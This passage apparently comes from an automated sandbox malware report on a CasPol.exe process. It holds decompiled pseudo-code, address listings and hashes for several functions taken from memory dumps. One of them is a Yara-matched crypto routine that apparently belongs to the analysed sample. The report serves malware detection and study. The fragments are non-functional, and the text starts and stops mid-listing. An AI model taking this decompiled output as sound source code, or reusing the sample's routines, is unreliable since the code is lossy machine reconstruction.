									goto L6;
								}
							}
						}
						goto L14;
					}
				}
				L14:
				_t29 = _t60 + 4; // 0x4
				return E0163B090(_v24, _t91, _v12, _t29);
			}
























                                                                0x016f2d1f
                                                                0x016f2d2c
                                                                0x016f2d31
                                                                0x016f2d33
                                                                0x016f2d42
                                                                0x016f2d4b
                                                                0x016f2d51
                                                                0x016f2d5d
                                                                0x016f2d62
                                                                0x016f2d6e
                                                                0x016f2d71
                                                                0x016f2d7d
                                                                0x016f2d87
                                                                0x016f2d8d
                                                                0x016f2d91
                                                                0x016f2da5
                                                                0x016f2db7
                                                                0x016f2dc8
                                                                0x016f2dcf
                                                                0x016f2dd1
                                                                0x016f2dd3
                                                                0x016f2dd6
                                                                0x016f2ddb
                                                                0x016f2ddd
                                                                0x00000000
                                                                0x016f2ddf
                                                                0x016f2df5
                                                                0x016f2e0e
                                                                0x016f2e12
                                                                0x016f2e1a
                                                                0x016f2e1c
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016f2e14
                                                                0x016f2e16
                                                                0x016f2e22
                                                                0x016f2e22
                                                                0x016f2e18
                                                                0x016f2e18
                                                                0x00000000
                                                                0x016f2e18
                                                                0x016f2e16
                                                                0x016f2df7
                                                                0x016f2df7
                                                                0x016f2dfc
                                                                0x016f2e04
                                                                0x016f2e06
                                                                0x016f2e1e
                                                                0x016f2e1e
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016f2dfe
                                                                0x016f2e00
                                                                0x016f2e08
                                                                0x016f2e08
                                                                0x016f2e02
                                                                0x016f2e02
                                                                0x00000000
                                                                0x016f2e02
                                                                0x016f2e00
                                                                0x016f2dfc
                                                                0x00000000
                                                                0x016f2df5
                                                                0x016f2ddf
                                                                0x016f2e26
                                                                0x016f2e26
                                                                0x016f2e3c

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 76b8ea77b1967d23121844d942ee949f261716c4c7d0e8a8764a5475bab6df70
                                                                • Instruction ID: 49ac2cf3a4339a3f54f918bec6dae1066f1f74732f053ad89a577dee106f971a
                                                                • Opcode Fuzzy Hash: 76b8ea77b1967d23121844d942ee949f261716c4c7d0e8a8764a5475bab6df70
                                                                • Instruction Fuzzy Hash: AE412CB1A002554FC715CF69CCA0ABBBFF5EF85211B1A81AEE981DB382DA34D546C770
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016EEA55 Relevance: .1, Instructions: 111COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 70%
                                                                			E016EEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E01642280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E016EE815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E0162F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E0163FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E016EAFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E016EBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E01647D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E016DFE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E0163FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E016EA80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                                                0x016eea55
                                                                0x016eea66
                                                                0x016eea68
                                                                0x016eea6c
                                                                0x016eea6f
                                                                0x016eea72
                                                                0x016eea75
                                                                0x016eea7a
                                                                0x016eea7a
                                                                0x016eea7e
                                                                0x016eea80
                                                                0x016eea85
                                                                0x016eea8b
                                                                0x016eeab5
                                                                0x016eeabc
                                                                0x016eeabf
                                                                0x016eeabf
                                                                0x016eeaca
                                                                0x016eeace
                                                                0x016eead0
                                                                0x016eeae4
                                                                0x016eeaeb
                                                                0x016eeaf0
                                                                0x016eeaf5
                                                                0x016eeb09
                                                                0x016eeb0d
                                                                0x016eeb1d
                                                                0x016eeb2d
                                                                0x016eeb38
                                                                0x016eeb3d
                                                                0x016eeb41
                                                                0x016eeb4a
                                                                0x016eeb60
                                                                0x016eeb4c
                                                                0x016eeb52
                                                                0x016eeb59
                                                                0x016eeb59
                                                                0x016eeb68
                                                                0x016eeb71
                                                                0x016eeb71
                                                                0x016eea8d
                                                                0x016eea8f
                                                                0x016eea92
                                                                0x016eea97
                                                                0x016eea97
                                                                0x016eea9b
                                                                0x016eea9c
                                                                0x016eea9e
                                                                0x016eeaa6
                                                                0x016eeaa6
                                                                0x016eeb7e

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                • Instruction ID: 4d14273f5d3b48e9eb76107195d4a649d9c24e9da3a823b9ae10b60955a32e35
                                                                • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                • Instruction Fuzzy Hash: 2A31A3726057069BC719DF28CC84A5BB7EAFBC0610F044A2DF95687785DB31E805CBA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016A69A6 Relevance: .1, Instructions: 108COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 69%
                                                                			E016A69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x171d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L01636C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E016A6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E01669980() >= 0) {
							E01642280(_t56, 0x1718778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1718774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1718774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0162B6F0(0x160c338, 0x160c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E01669520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E016695D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0163FFB0(_t68, _t77, 0x1718778);
				}
				_pop(_t78);
				return E0166B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                                0x016a69b5
                                                                0x016a69be
                                                                0x016a69c3
                                                                0x016a69c9
                                                                0x016a69cc
                                                                0x016a69d1
                                                                0x016a69d3
                                                                0x016a69de
                                                                0x016a69e1
                                                                0x016a69ea
                                                                0x016a69f6
                                                                0x016a69fe
                                                                0x016a6a13
                                                                0x016a6a14
                                                                0x016a6a15
                                                                0x016a6a16
                                                                0x016a6a1e
                                                                0x016a6a26
                                                                0x016a6a31
                                                                0x016a6a36
                                                                0x016a6a37
                                                                0x016a6a40
                                                                0x016a6a49
                                                                0x016a6a4a
                                                                0x016a6a53
                                                                0x016a6a59
                                                                0x016a6a5d
                                                                0x016a6a5e
                                                                0x016a6a64
                                                                0x016a6a67
                                                                0x016a6a6a
                                                                0x016a6a6d
                                                                0x016a6a70
                                                                0x016a6a77
                                                                0x016a6a7d
                                                                0x016a6a86
                                                                0x016a6a89
                                                                0x016a6a9c
                                                                0x016a6a9f
                                                                0x016a6aa2
                                                                0x016a6aa5
                                                                0x016a6aaf
                                                                0x016a6ab1
                                                                0x016a6ab8
                                                                0x016a6ab9
                                                                0x016a6abb
                                                                0x016a6abe
                                                                0x016a6ac5
                                                                0x016a6ac5
                                                                0x016a6aaf
                                                                0x016a6a40
                                                                0x016a6a26
                                                                0x016a69fe
                                                                0x016a6ace
                                                                0x016a6ad0
                                                                0x016a6ad3
                                                                0x016a6ad8
                                                                0x016a6adf
                                                                0x016a6adf
                                                                0x016a6ae8
                                                                0x016a6aef
                                                                0x016a6aef
                                                                0x016a6af9
                                                                0x016a6b06

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b2f39a433b092f0bc9ba6a9906bd18fdacab3b56ffccc57c9090f7f3ac773e40
                                                                • Instruction ID: e9bb99948151cd92979d9eeca490d7355e9c83f9ef6d8f7532f3f0e07200fac3
                                                                • Opcode Fuzzy Hash: b2f39a433b092f0bc9ba6a9906bd18fdacab3b56ffccc57c9090f7f3ac773e40
                                                                • Instruction Fuzzy Hash: 98417DB1D00209AFDB24CFA9D940BEEBBF9EF48714F18812EE915A3240DB70A905CF55
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00403853 Relevance: .1, Instructions: 108COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E00403853(signed char* __eax) {
				signed char* _t37;
				unsigned int _t65;
				unsigned int _t73;
				unsigned int _t81;
				unsigned int _t88;
				signed char _t94;
				signed char _t97;
				signed char _t100;

				_t37 = __eax;
				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
				_t94 = __eax[0xb];
				if((_t94 & 0x00000001) != 0) {
					_t65 = _t65 | 0x80000000;
				}
				_t37[0xc] = _t65 >> 0x18;
				_t37[0xf] = _t65;
				_t37[0xd] = _t65 >> 0x10;
				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
				_t97 = _t37[7];
				_t37[0xe] = _t65 >> 8;
				if((_t97 & 0x00000001) != 0) {
					_t73 = _t73 | 0x80000000;
				}
				_t37[8] = _t73 >> 0x18;
				_t37[0xb] = _t73;
				_t37[9] = _t73 >> 0x10;
				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
				_t100 = _t37[3];
				_t37[0xa] = _t73 >> 8;
				if((_t100 & 0x00000001) != 0) {
					_t81 = _t81 | 0x80000000;
				}
				_t37[4] = _t81 >> 0x18;
				_t37[7] = _t81;
				_t37[5] = _t81 >> 0x10;
				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
				 *_t37 = _t88 >> 0x18;
				_t37[1] = _t88 >> 0x10;
				_t37[6] = _t81 >> 8;
				_t37[2] = _t88 >> 8;
				_t37[3] = _t88;
				return _t37;
			}











                                                                0x00403853
                                                                0x0040387e
                                                                0x00403880
                                                                0x00403886
                                                                0x00403888
                                                                0x00403888
                                                                0x00403894
                                                                0x00403899
                                                                0x0040389f
                                                                0x004038cf
                                                                0x004038d1
                                                                0x004038d7
                                                                0x004038dd
                                                                0x004038df
                                                                0x004038df
                                                                0x004038ee
                                                                0x004038f3
                                                                0x004038f9
                                                                0x00403924
                                                                0x00403926
                                                                0x0040392c
                                                                0x00403932
                                                                0x00403934
                                                                0x00403934
                                                                0x00403943
                                                                0x0040394b
                                                                0x0040394e
                                                                0x00403972
                                                                0x00403979
                                                                0x00403980
                                                                0x0040398c
                                                                0x0040398f
                                                                0x00403992
                                                                0x00403996

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                • Instruction ID: e31d20633b43231726eebcedc7cabc7f2bcd3dedc8b658de99dff7b92833012d
                                                                • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                • Instruction Fuzzy Hash: F83172526586F14ED31E836D08BD675AEC18E9720174EC2FEDADA6F2F3C4988408D3A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01625210 Relevance: .1, Instructions: 107COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 85%
                                                                			E01625210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E016252A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E016695D0();
							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0163EB70(_t54, 0x17179a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E016695D0();
								L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0163EB70(_t54, 0x17179a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0166F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0163EB70(_t54, 0x17179a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E016695D0();
							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                                0x01625220
                                                                0x01625224
                                                                0x01680d13
                                                                0x01680d16
                                                                0x01680d19
                                                                0x0162522a
                                                                0x0162522a
                                                                0x0162522d
                                                                0x0162522d
                                                                0x01625231
                                                                0x01625235
                                                                0x01625239
                                                                0x01680d5c
                                                                0x01680d62
                                                                0x00000000
                                                                0x00000000
                                                                0x01680d6a
                                                                0x01680d7b
                                                                0x01680d7f
                                                                0x01680d81
                                                                0x01680d84
                                                                0x01680d95
                                                                0x01680d95
                                                                0x01680d6c
                                                                0x01680d71
                                                                0x01680d71
                                                                0x01680d9a
                                                                0x00000000
                                                                0x0162524a
                                                                0x0162524a
                                                                0x01625250
                                                                0x01680d24
                                                                0x01680d35
                                                                0x01680d39
                                                                0x01680d3b
                                                                0x01680d3e
                                                                0x01680d50
                                                                0x01680d50
                                                                0x01680d26
                                                                0x01680d2b
                                                                0x01680d2b
                                                                0x00000000
                                                                0x01680d55
                                                                0x01625256
                                                                0x0162525b
                                                                0x01625265
                                                                0x01680da7
                                                                0x0162526b
                                                                0x0162526e
                                                                0x01625272
                                                                0x01680db1
                                                                0x01680db4
                                                                0x01680dc5
                                                                0x01680dc5
                                                                0x01625272
                                                                0x01625278
                                                                0x0162527e
                                                                0x0162528a
                                                                0x0162528c
                                                                0x0162528d
                                                                0x00000000
                                                                0x01625280
                                                                0x01625282
                                                                0x01625288
                                                                0x0162529f
                                                                0x01625292
                                                                0x00000000
                                                                0x01625292
                                                                0x00000000
                                                                0x01625288
                                                                0x0162527e

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 14437c80797a5babf0538ab6dd06cf6d66fa9943d668dc4ba0a8d10529c66173
                                                                • Instruction ID: c12f3f649fc2dc3ec54c059bff25649f1bce5a6036106f3114a0bf3665a60b33
                                                                • Opcode Fuzzy Hash: 14437c80797a5babf0538ab6dd06cf6d66fa9943d668dc4ba0a8d10529c66173
                                                                • Instruction Fuzzy Hash: 6131F632242A11EBC736AF18CC51B7A77A6FF50760F118B1EF9560B2D0DB70E805CA94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01663D43 Relevance: .1, Instructions: 106COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E01663D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E01637B60(0, _t61, 0x16011c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E01637B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L01644620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                                0x01663d4c
                                                                0x01663d50
                                                                0x01663d55
                                                                0x01663d5e
                                                                0x0169e79a
                                                                0x00000000
                                                                0x0169e79a
                                                                0x01663d68
                                                                0x0169e789
                                                                0x01663d9d
                                                                0x01663da3
                                                                0x01663daf
                                                                0x01663db5
                                                                0x01663dbc
                                                                0x01663dc4
                                                                0x01663dc9
                                                                0x01663dce
                                                                0x0169e7ae
                                                                0x0169e7ae
                                                                0x01663dde
                                                                0x01663de2
                                                                0x01663de7
                                                                0x01663e0d
                                                                0x01663e13
                                                                0x01663e16
                                                                0x01663e1e
                                                                0x01663e25
                                                                0x01663e28
                                                                0x00000000
                                                                0x00000000
                                                                0x01663e2a
                                                                0x01663e2f
                                                                0x01663e37
                                                                0x01663e37
                                                                0x00000000
                                                                0x01663e37
                                                                0x01663e31
                                                                0x00000000
                                                                0x01663e31
                                                                0x01663e20
                                                                0x01663e20
                                                                0x01663e35
                                                                0x00000000
                                                                0x01663de9
                                                                0x01663de9
                                                                0x01663de9
                                                                0x01663dee
                                                                0x01663dfd
                                                                0x01663dff
                                                                0x01663e02
                                                                0x01663e05
                                                                0x01663e05
                                                                0x00000000
                                                                0x01663df0
                                                                0x01663de7
                                                                0x0169e78f
                                                                0x0169e794
                                                                0x01663d79
                                                                0x01663d84
                                                                0x01663d89
                                                                0x01663d8e
                                                                0x00000000
                                                                0x0169e7a4
                                                                0x01663d96
                                                                0x01663d9a
                                                                0x00000000
                                                                0x01663d9a
                                                                0x00000000
                                                                0x0169e794
                                                                0x01663d6e
                                                                0x01663d73
                                                                0x00000000
                                                                0x0169e7b5
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8a58165d3801414cf2da3fff85398030b66b16727c48a8d55b7b7e398948ae8d
                                                                • Instruction ID: 86f95f46861f53f161892f2ec75555627b9cb0b39123253187e3ebb95f8b96ad
                                                                • Opcode Fuzzy Hash: 8a58165d3801414cf2da3fff85398030b66b16727c48a8d55b7b7e398948ae8d
                                                                • Instruction Fuzzy Hash: A6318D32A05615DBDB29CF2DCC41A7ABBB9FF95710B05806EE94ACB360E730D841C7A1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0165A61C Relevance: .1, Instructions: 106COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 78%
                                                                			E0165A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x1700220);
				E0167D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x1717b9c; // 0x0
				_t55 = L01644620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0167D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x1717b10 =  *0x1717b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x171536c; // 0x77995368
					if( *_t51 != 0x1715368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x1715368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x171536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0165A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                                0x0165a61c
                                                                0x0165a61e
                                                                0x0165a623
                                                                0x0165a628
                                                                0x0165a62b
                                                                0x0165a62d
                                                                0x0165a648
                                                                0x0165a64a
                                                                0x0165a64f
                                                                0x01699b44
                                                                0x0165a6ec
                                                                0x0165a6f1
                                                                0x0165a6f1
                                                                0x0165a655
                                                                0x0165a657
                                                                0x0165a65a
                                                                0x0165a65d
                                                                0x0165a662
                                                                0x0165a663
                                                                0x0165a667
